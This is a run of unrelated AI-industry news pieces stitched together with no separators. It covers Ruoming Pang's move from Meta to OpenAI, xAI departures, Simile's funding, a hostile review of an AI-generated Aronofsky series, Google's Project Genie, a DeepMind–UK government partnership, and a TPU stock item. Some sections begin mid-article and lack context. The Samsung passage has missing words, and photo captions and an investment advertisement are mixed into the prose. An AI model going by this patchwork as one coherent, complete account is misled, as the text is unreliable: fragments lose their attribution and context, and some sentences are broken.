Sam Altman reportedly courted Pang for months. Andrew Harnik/Getty Images
Ruoming Pang, a prominent A.I. researcher recruited by Meta last year with a pay package reportedly worth more than $200 million, has left the company to join OpenAI, The Information reported yesterday (Feb. 25). His departure marks another setback for Mark Zuckerberg’s elite A.I. team and underscores the escalating A.I. talent war. Pang joined Meta Superintelligence Labs (MSL) in July after being poached from Apple. He remained at Meta for only seven months.
Zuckerberg unveiled MSL in July 2025 as the centerpiece of Meta’s push to develop advanced A.I. systems. The lab quickly became the focus of an aggressive—and costly—hiring spree. Alexandr Wang, founder of Scale AI, now leads the group as Meta’s A.I. chief after Meta acquired 40 percent of his startup. Within MSL, a smaller, more secretive unit known as TBD Lab is tasked with building next-generation foundation models.
Pang was originally from Shanghai and earned his undergraduate degree from Shanghai Jiao Tong University. He holds a master’s in computer science from the University of Southern California and earned a Ph.D. from Princeton University in 2006. Over the course of his career, Pang has worked on some of the most consequential A.I. systems in the industry, making him one of the more sought-after engineers in the field.
At Apple, he spent nearly four years as a “senior distinguished engineer,” leading development of the foundation models behind Apple Intelligence. Before Apple, Pang spent roughly 15 years at Google DeepMind as a principal software engineer, where he worked on large-scale machine learning systems, including privacy-preserving technologies and speech recognition.
OpenAI has not disclosed Pang’s title, scope of responsibilities or the terms of his compensation. The Sam Altman-led company reportedly courted him for months, so the package is likely substantial. OpenAI employees earn roughly $1.5 million in annual salary and equity, according to the Wall Street Journal. Pang is widely expected to continue working on foundation models and superintelligence research.
For Meta, Pang’s exit complicates Zuckerberg’s ambition to dominate the superintelligence race. The company has successfully recruited high-profile researchers from OpenAI, Google and Anthropic. However, MSL has also seen a steady stream of departures in recent months.
Other departures have been quieter but telling. Ethan Knight joined MSL for only a few weeks before moving to OpenAI last August—a stint so brief it never appeared on his LinkedIn profile. Bert Maher, a software engineer, left after 12 years at Meta to join Anthropic. Avi Verma, who had been expected to join Meta from OpenAI, ultimately backed out.
Pang’s move is the latest signal that Silicon Valley’s A.I. talent war is intensifying. Even as talk of an A.I. bubble grows louder and tech companies rely on increasingly complex financial structures to sustain lofty valuations, leaders like Zuckerberg, Altman and Anthropic’s Dario Amodei show little sign of restraint. Instead, they are offering compensation packages worth tens or even hundreds of millions of dollars to persuade top researchers that their vision for superintelligence will prevail.
More research on the threats of artificial intelligence (AI) “needs to be done urgently”, the boss of Google DeepMind has told BBC News. In an exclusive interview at the AI Impact Summit in Delhi, Sir Demis Hassabis said the industry wanted “smart regulation” for “the real risks” posed by the tech. Many tech leaders and politicians at the Summit have called for more global governance of AI, ahead of an expected joint statement as the event draws to a close. But the US has rejected this stance, with White House technology adviser Michael Kratsios saying: “AI adoption cannot lead to a brighter future if it is subject to bureaucracies and centralised control.” BBC
Elon Musk is suing the EU over a landmark €120m (£105m) fine against his social media company X, accusing Brussels officials of bias. X launched an appeal against December’s fine at the EU General Court earlier this week, in what is the first legal challenge to Europe’s tough digital laws. The challenge will escalate a row between Mr Musk, Brussels and the White House after the Trump administration claimed EU policies are suppressing free speech. Telegraph
Mind is launching a significant inquiry into artificial intelligence and mental health after a Guardian investigation exposed how Google’s AI Overviews gave people “very dangerous” medical advice. In a year-long commission, the mental health charity, which operates in England and Wales, will examine the risks and safeguards required as AI increasingly influences the lives of millions of people affected by mental health issues worldwide. Guardian
An ongoing phishing campaign that targets Microsoft 365 users by abusing OAuth tokens to gain long‑term access to corporate data, which focuses on business users in North America and aims to compromise Outlook, Teams, and OneDrive without directly stealing passwords. Instead of attacking login pages with fake forms, the operators trick victims into completing a real sign‑in process on Microsoft’s own device login portal, which makes the attack harder for both users and basic security tools to spot. Cybersecuritynews
Microsoft has confirmed that a bug allowed its Copilot AI to summarize customers’ confidential emails for weeks without permission. The bug, first reported by Bleeping Computer, allowed Copilot Chat to read and outline the contents of emails since January, even if customers had data loss prevention policies to prevent ingesting their sensitive information into Microsoft’s large language model. Copilot Chat allows paying Microsoft 365 customers to use the AI-powered chat feature in its Office software products, including Word, Excel, and PowerPoint. Techcrunch
If you want an even better AI model, there could be reason to celebrate. Google, on Thursday, announced the release of Gemini 3.1 Pro, characterizing the model’s arrival as “a step forward in core reasoning.” Measured by the release cadence of machine learning models, Gemini 3.1 Pro is hard on the heels of recent model debuts from Anthropic and OpenAI. There’s barely enough time to start using new US commercial AI models before a competitive alternative surfaces. And that’s to say nothing about the AI models coming from outside the US, like Qwen3.5. TheRegister
A.I. pioneer Fei-Fei Li is lending her support to Simile’s effort to simulate human behavior at scale. John Nacion/Variety via Getty Images
Every three months, public companies brace for analyst questions during quarterly earnings calls. But what if firms could predict these queries in advance and rehearse their responses? That’s one of the capabilities touted by Simile, a new A.I. startup spun out of Stanford and backed by acclaimed researcher Fei-Fei Li and OpenAI co-founder Andrej Karpathy.
Simile emerged from stealth yesterday (Feb. 12) with $100 million in funding from a round led by Index Ventures. Alongside Li and Karpathy, the startup—which hasn’t disclosed its valuation—also counts investors including Quora co-founder Adam D’Angelo and Scott Belsky, a partner at A24 Films.
Li and Karpathy both have close ties to Simile’s founding team, which includes Stanford researchers Joon Park, Percy Liang and Michael Bernstein. Li is the co-director of Stanford’s Human-Centered A.I. Institute and advised Karpathy during his Ph.D. study at the university. She is widely known for foundational work such as ImageNet, a large-scale image database that helped drive major breakthroughs in computer vision. Karpathy and Bernstein also contributed to that project.
Simile’s mission of using A.I. to reflect and model societal behavior taps into an underexplored research area, according to Karpathy, who previously worked at OpenAI and Tesla before launching his own education-focused A.I. startup. While large language models typically present a single, cohesive personality, Karpathy argues they are actually trained on data drawn from vast numbers of people. “Why not lean into that statistical power: Why simulate one ‘person’ when you could try to simulate a population?” he wrote in a post on X.
That idea underpins Simile’s broader goal. The Palo Alto-based startup aims to simulate the real-world effects of major decisions, from public policy to product launches, across virtual populations that mirror human behavior. The team has already tested this concept on a smaller scale through projects like Smallville, a 2023 Stanford experiment in which 25 autonomous A.I. agents interacted in a virtual environment.
Now, Simile is scaling the approach for business use. After spending the past seven months developing its model, the company is already working with clients on applications ranging from product development to litigation forecasting. CVS Health Corporation, for example, uses Simile to create simulated focus groups, while Gallup uses the platform to build digital polling panels. For earning calls, Simile can predict about 80 percent of the questions that analysts ultimately ask, said Park, the startup’s CEO, during a recent appearance on TBPN.
At present, Simile’s models are based on data from hundreds of thousands of people who have signed up for its studies. Over time, the company hopes to expand that to simulations representing the world’s entire population of roughly 8 billion people.
Simile joins a growing wave of A.I. companies focused on using simulation to model real-world scenarios. Much of the existing research in this space has centered on physical systems, such as robotics and autonomous vehicles, through “world model” platforms developed by firms like Google and Nvidia.
Wu and Ba’s exits appeared amicable. But lower-level employees have been more candid about internal tensions at the Musk-run startup. Several members of xAI’s technical staff have also left in recent weeks, according to their posts on X and LinkedIn.
“All A.I. labs are building the exact same thing, and it’s boring,” said Vahid Kazemi, who worked on xAI’s audio models, in a post on X. “I think there’s room for more creativity. So, I’m starting something new.”
In an interview with NBC News, Kazemi also criticized the company’s working culture, saying he regularly worked 12-hour days, including holidays and weekends.
Launched in March 2023 with a roster of industry veterans from companies like OpenAI, Google, Microsoft, and Tesla, xAI will now operate as a wholly owned subsidiary of SpaceX. The new iteration of SpaceX faces no shortage of challenges: Grok continues to face legal scrutiny, while Musk’s leadership style remains a point of contention.
Here are the co-founders and notable leaders who have left xAI so far—and where they are now.
Jimmy Ba
Jimmy Ba, who led A.I. safety at xAI, announced his exit on Feb. 10. A professor at the University of Toronto who studied under A.I. pioneer Geoffrey Hinton, Ba’s research played a key role in shaping Grok’s development.
“So proud of what the xAI team has done and will continue to stay close as a friend of the team,” Ba wrote on X. He hasn’t announced his next move, but added that “2026 is gonna be insane and likely the busiest (and most consequential) year for the future of our species.”
Tony Wu, a former research scientist at Google and postdoctoral researcher at Stanford University, announced his departure from xAI on Feb. 9.
Wu led xAI’s reasoning team. “It’s time for my next chapter…It is an era with full possibilities: a small team armed with AIs can move mountains and redefine what’s possible,” he wrote on X.
Wu has not disclosed his next role. Co-founders Guodong Zhang and Manuel Kroiss remain at xAI and are helping lead the company’s reorganization.
Mike Liberatore
While not a founding member, Mike Liberatore joined xAI as chief financial officer in April 2025, just one month after xAI acquired X in a deal that valued the combined company at $113 billion.
Musk replaced Liberatore with ex-Morgan Stanley banker Anthony Armstrong. Armstrong advised Musk on his Twitter (now X) acquisition in 2022 and later served as a senior advisor at the Office of Personnel Management during Musk’s controversial tenure at the Department of Government Efficiency (DOGE).
Greg Yang
Greg Yang spent nearly six years as a researcher at Microsoft before joining xAI’s founding team. He left the company in January due to health complications from Lyme disease.
“Likely I contracted Lyme a long time ago, but until I pushed myself hard building xAI and weakened my immune system, the symptoms weren’t noticeable,” Yang wrote on X. He continues to advise xAI in an informal capacity.
Igor Babuschkin
Igor Babuschkin, a former research engineer at OpenAI and Google DeepMind, was a co-founder and key engineering lead at xAI. Widely known as the primary developer behind Grok, Babuschkin left in July 2025 to start his own venture capital firm, Babuschkin Ventures, focused on A.I. research and startups.
Christian Szegedy
Christian Szegedy spent 12 years at Google before joining xAI as a founding research scientist. He left xAI in February 2025 to become chief scientist at superintelligence cloud company Morph Labs.
More than a year later, he departed that role to found mathematical A.I. startup Math Inc. in September, according to his LinkedIn.
Kyle Kosic left OpenAI in early 2023 after two years to co-found xAI, where he served as engineering infrastructure lead. He departed about a year later, in April 2024, to return to OpenAI as a technical staff member.
Kosic was the first co-founder to leave xAI and did not issue a public statement. It is unclear who now leads xAI’s engineering infrastructure, though another co-founder, Ross Nordeen, remains the company’s technical program manager after previously holding the same role at Tesla.
Darren Aronofsky used to be a director who made interesting, if sometimes polarizing, films like Black Swan, Mother!, Noah, and The Wrestler. But it seems like a safe bet that people won’t need to debate whether Aronofsky’s new project is any good. Because anyone with eyes can see that it looks like low-effort AI slop. To put it another way, it looks like absolute dogshit.
Aronofsky is producing a new short-form series with his AI production company Primordial Soup titled “On This Day… 1776,” according to the Hollywood Reporter. The series uses tech from Google DeepMind to create short videos about the Revolutionary War, published on the YouTube channel for Time magazine. In 2018, Salesforce founder Marc Benioff bought Time, and the cloud software giant is sponsoring this monstrosity of a series.
The series uses human voice actors who belong to the Screen Actors Guild (SAG), which is clearly an attempt to tamp down on the inevitable backlash from both inside and outside Hollywood. Folks inside the movie and TV industry have fiercely pushed back against the use of AI to replace the skilled artists and actors who create the media we watch. That concern obviously comes from a place of self-interest because nobody wants to be pushed out of a job. But they also care about the quality of the work being produced. And there’s also been a revolt among the average consumer, people who’ve been inundated with the lowest-grade AI garbage imaginable. It’s really everywhere now.
The first episode, titled “The Flag,” is three-and-a-half minutes long and attempts to tell the story of George Washington raising the Continental Union Flag in Somerville, Massachusetts. It offers nothing compelling in the way of narrative. It’s the kind of thing that you’d skip over as a cut-scene in a particularly bad video game.
Everything has a dead and creepy quality, as the actors’ audio is poorly synced with the lips of the AI concoctions.
Have you ever seen a Spaghetti Western from the 1960s where the audio just doesn’t seem to match, even though it was clearly shot with actors speaking English, and the “dub” is in English? That happened because the audio was added in post-production, a result of direct sound recording being expensive in Italy during the post-war era. You get the same effect here, though there’s no good reason. Well, no good reason outside of presumably saving a ton of money on hiring human actors.
The second episode, titled “Common Sense,” tries to tell the story of Thomas Paine writing Common Sense. Benjamin Franklin makes an appearance, though it proves that the most recognizable of the founding fathers in this series are the weirdest to look at.
The episode jumps around incoherently, much like the first episode, without grounding the viewer in anything we should care about. It’s truly an ugly mess. And if you bother to pause the scenes, you can spot the kind of telltale anomalies that plague other AI-generated video projects, like strangely deformed hands in the background characters. Hands are always giving this stuff away.
Then there are the words that appear on screen in the trailer, like the pamphlet that’s supposed to include the word “America” but instead reads something closer to “Λamereedd.”
The series is specifically made for this sestercentennial year of America’s founding, and each episode will reportedly drop on the 250th anniversary of the day it happened, according to the Hollywood Reporter. And that’s certainly a fun concept if the final product were something worth watching. But it’s not. It’s garbage. The people who are making and distributing it obviously don’t think so.
“This project is a glimpse at what thoughtful, creative, artist-led use of AI can look like — not replacing craft, but expanding what’s possible and allowing storytellers to go places they simply couldn’t before,” Ben Bitonti, president of Time Studios, told the Hollywood Reporter.
The reaction on social media hasn’t been so kind. “I know my expectations were low but holy fuck Darren Aronofsky producing AI slop wasn’t on my bingo card,” one X user wrote. Over on Bluesky another joked, “Used to be that when Darren Aronofsky wanted to feature a dead-eyed actor, he’d just employ Jared Leto.”
And other users have been picking apart all the anomalies, with one Bluesky critic writing: “Love the new Aronofsky scene where the colonist takes off his hat to cheer, revealing that underneath it was a second and somehow larger hat.”
“Nothing represents The End of America after a 250-year run quite like using AI slop to depict the creation of the Declaration of Independence,” another user quipped.
The videos have been up at Time’s YouTube channel for over 7 hours as of the time of this writing, but they’re not gaining much attention in their original format. The first episode has just 5,000 views. The second episode has a little over 2,000. Social media posts ridiculing the production seem to be faring better, simply because people are making fun of them. One video on Bluesky has over 2,500 quote posts, with almost all seemingly making jokes about how awful it looks.
Gizmodo reached out to Ken Burns for comment, but didn’t immediately receive a reply.
Google DeepMind is opening up access to Project Genie, its AI tool for creating interactive game worlds from text prompts or images.
Starting Thursday, Google AI Ultra subscribers in the U.S. can play around with the experimental research prototype, which is powered by a combination of Google’s latest world model Genie 3, its image generation model Nano Banana Pro, and Gemini.
Coming five months after Genie 3’s research preview, the move is part of a broader push to gather user feedback and training data as DeepMind races to develop more capable world models.
World models are AI systems that generate an internal representation of an environment, and can be used to predict future outcomes and plan actions. Many AI leaders, including those at DeepMind, believe world models are a crucial step to achieving artificial general intelligence (AGI). But in the nearer term, labs like DeepMind envision a go-to-market plan that starts with video games and other forms of entertainment and branches out into training embodied agents (aka robots) in simulation.
“I think it’s exciting to be in a place where we can have more people access it and give us feedback,” Shlomi Fruchter, a research director at DeepMind, told TechCrunch via video interview, smiling ear-to-ear in clear excitement over Project Genie’s release.
DeepMind researchers that TechCrunch spoke to were upfront about the tool’s experimental nature. It can be inconsistent, sometimes impressively generating playable worlds, other times producing baffling results that miss the mark. Here’s how it works.
Techcrunch event
Boston, MA | June 23, 2026
A claymation-style castle in the sky made of marshmallows and candy.Image Credits:TechCrunch
You start with a “world sketch” by providing text prompts for both the environment and a main character, whom you will later be able to maneuver through the world in either first or third person view. Nano Banana Pro creates an image based on the prompts that you can, in theory, modify before Genie uses the image as a jumping off point for an interactive world. The modifications mostly worked, but the model occasionally stumbled and would give you purple hair when you asked for green.
You can also use real life photos as a baseline for the model to build a world on, which, again, was hit or miss. (More on that later.)
Once you’re satisfied with the image, it takes a few seconds for Project Genie to create an explorable world. You can also remix existing worlds into new interpretations by building on top of their prompts, or explore curated worlds in the gallery or via the randomizer tool for inspiration. You can then download videos of the world you just explored.
DeepMind is only granting 60 seconds of world generation and navigation at the moment, in part due to the budget and compute constraints. Because Genie 3 is an auto-regressive model, it takes a lot of dedicated compute – which puts a tight ceiling on how much DeepMind is able to provide to users.
“The reason we limit it to 60 seconds is because we wanted to bring it to more users,” Fruchter said. “Basically when you’re using it, there’s a chip somewhere that’s only yours and it’s being dedicated to your session.”
He added that extending it beyond 60 seconds would diminish the incremental value of the testing.
“The environments are interesting, but at some point, because of their level of interaction and the dynamism of the environment is somewhat limited. Still, we see that as a limitation we hope to improve on.”
Whimsy works, realism doesn’t
Google received a cease-and-desist from Disney last year, so it wouldn’t build models that were Disney-related.Image Credits:TechCrunch
When I used the model, the safety guardrails were already up and running. I couldn’t generate anything resembling nudity, nor could I generate worlds that even remotely sniffed of Disney or other copyrighted material. (In December, Disney hit Google with a cease-and-desist, accusing the firm’s AI models of copyright infringement by training on Disney’s characters and IP and generating unauthorized content, among other things.) I couldn’t even get Genie to generate worlds of mermaids exploring underwater fantasy lands or ice queens in their wintery castles.
Still, the demo was deeply impressive. The first world I built was an attempt to live out a small childhood fantasy, in which I could explore a castle in the clouds made up of marshmallows with a chocolate sauce river and trees made of candy. (Yes, I was a chubby kid.) I asked the model to do it in claymation style, and it delivered a whimsical world that childhood me would have eaten up, the castle’s pastel-and-white colored spires and turrets looking puffy and tasty enough to rip off a chunk and dunk it into the chocolate moat. (Video above.)
A “Game of Thrones” inspired world that failed to generate as photo-realistically as I wanted.Image Credits:TechCrunch
That said, Project Genie still has some kinks to work out.
The models excelled at creating worlds based on artistic prompts, like using watercolors, anime style or classic cartoon aesthetics. But it tended to fail when it came to photorealistic or cinematic worlds, often coming out looking like a video game rather than real people in a real setting.
It also didn’t always respond well when given real photos to work with. When I gave it a photo of my office and asked it to create a world based on the photo exactly as it was, it gave me a world that had some of the same furnishings of my office – a wooden desk, plants, a grey couch – laid out differently. And it looked sterile, digital, not lifelike.
When I fed it a photo of my desk with a stuffed toy, Project Genie animated the toy navigating the space, and even had other objects occasionally react as it moved past them.
That interactivity is something DeepMind is working on improving. There were several occasions when my characters walked right through walls or other solid objects.
I asked Project Genie to animate a stuffed toy (Bingo Bronson) so it could explore my desk. Image Credits:TechCrunch
When DeepMind released Genie 3 initially, researchers highlighted how the model’s auto-regressive architecture meant that it could remember what it had generated, so I wanted to test that by returning to parts of the environment it generated already to see if it would be the same. For the most part, the model succeeded. In one case, I generated a cat exploring yet another desk, and only once when I turned back to the right side of the desk did the model generate a second mug.
The part I found most frustrating was the way you navigated the space using the arrows to look around, the spacebar to jump or ascend, and the W-A-S-D keys to move. I’m not a gamer, so this didn’t come naturally to me, but the keys were often non-responsive, or they sent you in the wrong direction. Trying to walk from one side of the room to a doorway on the other side often became a chaotic zigzagging exercise, like trying to steer a shopping cart with a broken wheel.
Fruchter assured me that his team was aware of these shortcomings, reminding me again that Project Genie is an experimental prototype. In the future, he said, the team hopes to enhance the realism and improve interaction capabilities, including giving users more control over actions and environments.
“We don’t think about [Project Genie] as an end-to-end product that people can go back to everyday, but we think there is already a glimpse of something that’s interesting and unique and can’t be done in another way,” he said.
From infrastructure battles to physical-world intelligence, A.I.’s next chapter is already taking shape. Unsplash
In November, ChatGPT turned three, with a global user base rapidly approaching one billion. At this point, A.I. is no longer an esoteric acronym that needs explaining in news stories. It has become a daily utility, woven into how we work, learn, shop and even love. The field is also far more crowded than it was just a few years ago, with competitors emerging at every layer of the stack.
Over the past year, conversation around A.I. has taken on a more complicated tone. Some argue that consumer chatbots are nearing a plateau. Others warn that startup valuations are inflating into a bubble. And, as always, there’s the persistent anxiety that A.I. may one day outgrow human control altogether.
So what comes next? Much of the industry’s energy is now focused on the infrastructure side of A.I. Big Tech companies are racing to solve the hardware bottlenecks that limit today’s systems, while startups experiment with applications far beyond chatbots. At the same time, researchers are beginning to look past language models altogether, toward models that can reason about the physical world.
Below are the key themes Observer has identified over the past year of covering this space. Many of these developments are still unfolding and are likely to shape the field well into 2026 and beyond.
A.I. chips
Even as OpenAI faces growing competition at the model level, its primary chip supplier, Nvidia, remains in a league of its own. Demand for its GPUs continues to outstrip supply, and no rival has yet meaningfully disrupted its dominance. Traditional semiconductor companies such as AMD and Intel are racing to claw back market share, while some of Nvidia’s largest customers are designing their own chips to reduce dependence on a single supplier.
To borrow from philosopher Ludwig Wittgenstein, the limits of language are the limits of our world. Today’s A.I. systems have grown remarkably fluent in human language—especially English—but language captures only a narrow slice of intelligence. That limitation has prompted some researchers to argue that large language models alone can never reach human-level understanding.
That belief is fueling a push toward so-called “world models,” which aim to teach machines how the physical world works—how objects move, how space is structured, and how cause and effect unfold. LeCun is now leaving Meta to build such a system himself. Fei-Fei Li’s startup, World Labs, unveiled its first model in November after nearly two years of development. Google DeepMind has released early versions through its Genie projects, and Nvidia is betting heavily on physical A.I. with its Cosmos models.
Language-specific A.I.
While pioneering researchers look beyond language, linguistic barriers remain one of A.I.’s most practical challenges. More than half of the internet’s content is written in English, skewing training data and limiting performance in other languages.
It’s only natural that there’s a consumer hardware angle of A.I. This year brought a wave of experiments in wearable A.I.—some met with curiosity, others with discomfort.
Friend, a startup selling an A.I. pendant, sparked backlash after a New York City subway campaign framed its product as a substitute for human companionship. In December, Meta acquired Limitless, the maker of a $99 wearable that records and summarizes conversations. Earlier in the year, Amazon bought Bee, which produces a $50 bracelet designed to transcribe daily activity and generate summaries.
Meta is also developing a new line of smart glasses with EssilorLuxottica, the company behind Ray-Ban and Oakley. In July, Mark Zuckerberg went so far as to suggest that people without A.I.-enhanced glasses could eventually face a “significant cognitive disadvantage.” Meanwhile, OpenAI is quietly collaborating with former Apple design chief Jony Ive on a mysterious hardware project of its own. This all suggests the next phase of A.I. may be something we wear, not just something we type into.
Universities are rapidly expanding A.I. programs as students seek skills that can withstand an increasingly automated future. Photo by: Jumping Rocks/Universal Images Group via Getty Images
When Chris Callison-Burch first started teaching an A.I. course at the University of Pennsylvania in2018, his inaugural class had about 100 students. Seven years later, enrollment has swelled to roughly 400—excluding another 250 students attending remotely and an additional 100 to 200 on the waiting list. The professor now teaches in the largest classroom on campus. If his course grew any bigger, he’d need to move into the school’s sports stadium.
“I would love to think that’s all because I’m a dynamic lecturer,” Callison-Burch told Observer. “But it’s really a testament to the popularity of the field.”
Demand for A.I. courses and degrees has soared across higher education as the technology plays an increasingly central role in daily life and begins to encroach on once-popular fields like computer science. Amid uncertainty about the future of the labor market, students are seeking to prepare for an A.I.-dominated economy by immersing themselves in the field.
Universities have followed suit. Schools like Carnegie Mellon and Purdue University are among a number offering undergraduate or graduate degrees in A.I., a trend expected to accelerate in the coming years. The University of Pennsylvania recently became the first Ivy League school to offer both undergraduate and graduate A.I. programs. Its graduate curriculum includes courses in natural language processing and machine learning, in addition to required classes on technology ethics and the broader legal landscape.
The demand is widespread. The University of Buffalo’s A.I. master’s program enrolled 103 students last year, up from just five in its inaugural 2020 cohort. At the Massachusetts Institute of Technology, undergraduate enrollment in A.I. has jumped from 37 students in 2022 to more than 300. Miami Dade College has seen a 75 percent increase in enrollment in its A.I. programs since 2022, while its other programs have remained relatively steady aside from a “slight decrease in computer science,” the school told Observer.
Callison-Burch, who also serves as faculty director of Penn’s online A.I. master’s program, has noticed a similar decline. “There’s an interesting trend at the moment where it looks like computer science enrollment is dipping,” he said, pointing to increased A.I.-powered automation across the field. More than 60 percent of undergraduate computing programs saw a decline in employment for the 2025-2026 year compared to the year prior, according to a recent report from the Computing Research Association.
That decline comes as A.I. reshapes some of the professions most exposed to its advances. In fields like coding, early-career workers have already experienced a 13 percent relative decline in employment, according to an August research paper from Stanford.
Yann LeCun, Meta’s former chief A.I. scientist, advises young people to become adept at learning itself, as their job is “almost certainly going to change” over time. “My suggestion is to take courses on topics that are fundamental and have a long shelf life,” he told Observer via email, pointing to mathematics, physics and engineering as core areas of focus.
It’s not just students grappling with these shifts. Callison-Burch noted that professors, too, are trying to adapt and determine how best to integrate A.I. into their classrooms. One thing, he said, is certain: the technology will only become more pervasive. That makes it all the more important for young people to familiarize themselves with its tools.
Even so, he acknowledged that predicting how A.I. will reshape the labor market remains extraordinarily difficult, making it hard for students to bet confidently on any one path. “I don’t think there’s an easy way of picking something that’s going to be future-proof, when we can’t yet see that future,” he said.
Samsung has that it “aims to be the first” to natively integrate Google Photos into TVs. The aim is for Google Photos to work seamlessly with , Samsung’s souped-up version of Bixby. This would help to make user photos part of the day-to-day TV experience, with photos appearing while navigating the TV’s OS during “contextual and convenient moments.”
The company says users will be able to explore their Google Photos libraries in three new experiences. The first is called Memories, and will show curated stories based on “people, locations and meaningful moments.” This has a planned launch in March 2026 and will be exclusive to Samsung TVs for six months.
Create with AI will use image generation and editing model, enabling users to transform their photos using AI using themed templates. Users will also be able to turn any still image into a short video using the tool. Create with AI has a planned launch in the second half of 2026.
Finally, Personalized Results will create themed slideshows of users’ photos based on particular topics or the content of an image. Examples given by Samsung include the ocean, hiking and Paris. This also has a planned launch in the latter part of 2026.
AI lab GoogleDeepMind announced a major new partnership with the U.K. government Wednesday, pledging to accelerate breakthroughs in materials science and clean energy, including nuclear fusion, as well as conducting joint research on the societal impacts of AI and on ways to make AI decision-making more interpretable and safer.
As part of the partnership, Google DeepMind said it would open its first automated research laboratory in the U.K. in 2026. That lab will focus on discovering advanced materials including superconductors that can carry electricity with zero resistance. The facility will be fully integrated with Google’s Gemini AI models. Gemini will serve as a kind of scientific brain for the lab, which will also use robotics to synthesize and characterize hundreds of materials per day, significantly accelerating the timeline for transformative discoveries.
The company will also work with the U.K. government and other U.K.-based scientists on trying to make breakthroughs in nuclear fusion, potentially paving the way for cheaper, cleaner energy. Fusion reactions should produce abundant power while producing little to no nuclear waste, but such reactions have proved to be very difficult to sustain or scale up.
Additionally, Google DeepMind is expanding its research alliance with the government-run U.K. AI Security Institute to explore methods for discovering how large language models and other complex neural network-based AI models arrive at decisions. The partnership will also involve joint research into the societal impacts of AI, such as the effect AI deployment is likely to have on the labor market and the impact increased use of AI chatbots may have on mental health.
British Prime Minister Keir Starmer said in a statement that the partnership would “make sure we harness developments in AI for public good so that everyone feels the benefits.”
“That means using AI to tackle everyday challenges like cutting energy bills thanks to cheaper, greener energy and making our public services more efficient so that taxpayers’ money is spent on what matters most to people,” Starmer said.
Google DeepMind cofounder and CEO Demis Hassabis said in a statement that AI has “incredible potential to drive a new era of scientific discovery and improve everyday life.”
As part of the partnership, British scientists will receive priority access to Google DeepMind’s advanced AI tools, including AlphaGenome for DNA sequencing; AlphaEvolve for designing algorithms; DeepMind’s WeatherNext weather forecasting models; and its new AI co-scientist, a multi-agent system that acts as a virtual research collaborator.
DeepMind was founded in London in 2010 and is still headquartered there; it was acquired by Google in 2014.
Gemini’s U.K. footprint expands
The collaboration also includes potential development of AI systems for education and government services. Google DeepMind will explore creating a version of Gemini tailored to England’s national curriculum to help teachers reduce administrative workloads. A pilot program in Northern Ireland showed that Gemini helped save teachers an average of 10 hours per week, according to the U.K. government.
For public services, the U.K. government’s AI Incubator team is trialing Extract, a Gemini-powered tool that converts old planning documents into digital data in 40 seconds, compared to the current two-hour process.
The expanded research partnership with the U.K. AI Security Institute will focus on three areas, the government and DeepMind said: developing techniques to monitor AI systems’ so-called “chain of thought”—the reasoning steps an AI model takes to arrive at an answer; studying the social and emotional impacts of AI systems; and exploring how AI will affect employment.
U.K. AISI currently tests the safety of frontier AI models, including those from Google DeepMind and a number of other AI labs, under voluntary agreements. But the new research collaboration could potentially raise concerns about whether the U.K. AISI will remain objective in its testing of its now-partner’s models.
In response to a question on this from Fortune, William Isaac, principal scientist and director of responsibility at Google DeepMind, did not directly address the issue of how the partnership might affect the U.K. AISI’s objectivity. But he said the new research agreement puts in place “a separate kind of relationship from other points of interaction.” He also said the new partnership was focused on “question on the horizon” rather than present models, and that the researchers would publish the results of their work for anyone to review.
Isaac said there is no financial or commercial exchange as part of the research partnership, with both sides contributing people and research resources.
“We’re excited to announce that we’re going to be deepening our partnership with the U.K. AISI to really focus on exploring, really the frontier research questions that we believe are going to be important for ensuring that we have safe and responsible development,” he said.
He said the partnership will produce publicly accessible research focused on foundational questions—such as how AI impacts jobs or how talking to chatbots effects mental health—rather than policy-specific recommendations, though the findings could influence how businesses and policymakers think about AI and how to regulate it.
“We want the research to be meaningful and provide insights,” Isaac said.
Isaac described the U.K. AISI as “the crown jewel of all of the safety institutes” globally and said deepening the partnership “sends a really strong signal” about the importance of engaging responsibly as AI systems become more widely adopted.
The partnership also includes expanded collaboration on AI-enhanced approaches to cybersecurity. This will include the U.K. government exploring the sue of tools like Big Sleep, an AI agent developed by Google that autonomously hunts for previously unknown “Zero Day” cybersecurity exploits, and CodeMender, another AI agent that can search for and then automatically patch security vulnerabilities in open source software.
British Technology Secretary Liz Kendall is visiting San Francisco this week to further the U.K.-U.S. Tech Prosperity Deal, which was agreed to during U.S. President Trump’s state visit to the U.K. in September. In November alone, the British government said the pact helped secure more than $32.4 billion of private investment committed to the U.K tech sector.
The Google-U.K. partnership builds on a £5 billion ($6.7 billion) investment commitment from Google made earlier this year to support U.K. AI infrastructure and research, and to help modernize government IT systems.
The British government also said collaboration supports its AI Opportunities Action Plan and its £137 million AI for Science Strategy, which aims to position the UK as a global leader in AI-driven research.
Alphabet (GOOG) shares rose 2.1% after reports that Meta is in advanced talks to spend billions on Google’s TPU chips instead of NVIDIA GPUs.
Google TPUs are 2x cheaper than NVIDIA GPUs at standard 9,000-chip rack configurations.
NVIDIA lost roughly $250B in market value as Wall Street recognized TPUs as a legitimate alternative.
If you’re thinking about retiring or know someone who is, there are three quick questions causing many Americans to realize they can retire earlier than expected. take 5 minutes to learn more here
Alphabet Inc. (NASDAQ: GOOG) shares climbed 2.1% on Friday, November 28, 2025, as retail sentiment surged to 64 (bullish) while NVIDIA Corporation (NASDAQ: NVDA) sentiment dropped to 33 (bearish). The catalyst: reports that Meta Platforms Inc. (NASDAQ:META) is in advanced talks to spend billions on Google’s TPU chips instead of NVIDIA’s GPUs, triggering discussion about the first real crack in NVIDIA’s dominance.
On r/stocks, user One-Blacksmith-4654 captured investor confusion in a post that drew 734 upvotes: “Alphabet suddenly ripping toward a multi-trillion valuation and Nvidia losing a massive chunk of market cap even though demand for GPUs is supposedly still sky-high…none of this lines up with the narratives we were all trading on earlier this year.”
Alphabet suddenly ripping toward a multi-trillion valuation by u/One-Blacksmith-4654 in stocks
Nvidia vs Google heats up after Meta considers switching chips by u/Illustrious_Lie_954 in StockMarket
A detailed analysis on r/StockMarket noted that “after reports came out that Meta is in advanced talks to spend billions on Google’s AI chips instead of Nvidia’s, the company actually put out a statement defending its market position. That rarely happens.” NVIDIA’s stock shed roughly $250B in market value while Alphabet shares jumped as Wall Street recognized TPUs as a legitimate alternative.
Three factors drive the bullish case:
Google TPUs are 2x cheaper than NVIDIA GPUs at standard 9,000-chip rack configurations, per semiconductor research cited on r/wallstreetbets
Potential TPU customers could represent up to 10% of NVIDIA’s annual revenue, per The Information
A Google DeepMind TPU engineer stated on X that the market is “clueless about hardware and the demand” following NVIDIA’s sell-off. The comment, shared widely on r/StockMarket with 436 upvotes, emphasized that AI hardware demand remains consistently high despite stock volatility.
